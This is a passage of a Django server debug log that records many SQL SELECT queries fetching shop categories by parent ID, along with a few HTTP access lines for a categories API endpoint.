"shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-20 07:29:57,215 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-20 07:29:57,219 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-20 07:29:57,221 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-20 07:29:57,223 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-20 07:29:57,227 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-20 07:29:57,229 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-20 07:29:57,232 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-20 07:29:57,234 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-20 07:29:57,236 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-20 07:29:57,240 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-20 07:29:57,242 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-20 07:29:57,245 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-20 07:29:57,247 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-20 07:29:57,249 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-20 07:29:57,251 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-20 07:29:57,255 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-20 07:29:57,257 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-20 07:29:57,260 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-20 07:29:57,262 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-20 07:29:57,264 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-20 07:29:57,268 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-20 07:29:57,270 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-20 07:29:57,273 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-20 07:29:57,275 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-20 07:29:57,277 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-20 07:29:57,281 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-20 07:29:57,283 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-20 07:29:57,286 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-20 07:29:57,288 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-20 07:29:57,290 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-20 07:29:57,293 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-20 07:29:57,296 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-20 07:29:57,298 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-20 07:29:57,300 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-20 07:29:57,303 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-20 07:29:57,306 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [20/Dec/2019 07:29:57] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [20/Dec/2019 07:30:16] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-20 07:30:43,520 utils 4252 140031503103744 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-20 07:30:43,527 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-20 07:30:43,531 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-20 07:30:43,533 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-20 07:30:43,536 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-20 07:30:43,539 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-20 07:30:43,541 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-20 07:30:43,543 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-20 07:30:43,545 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-20 07:30:43,549 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-20 07:30:43,551 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-20 07:30:43,553 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-20 07:30:43,555 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-20 07:30:43,558 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-20 07:30:43,561 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-20 07:30:43,563 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-20 07:30:43,566 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-20 07:30:43,568 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-20 07:30:43,570 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-20 07:30:43,574 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-20 07:30:43,576 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-20 07:30:43,579 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-20 07:30:43,581 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-20 07:30:43,583 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-20 07:30:43,585 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-20 07:30:43,589 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-20 07:30:43,591 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-20 07:30:43,593 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-20 07:30:43,595 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-20 07:30:43,598 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-20 07:30:43,601 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", 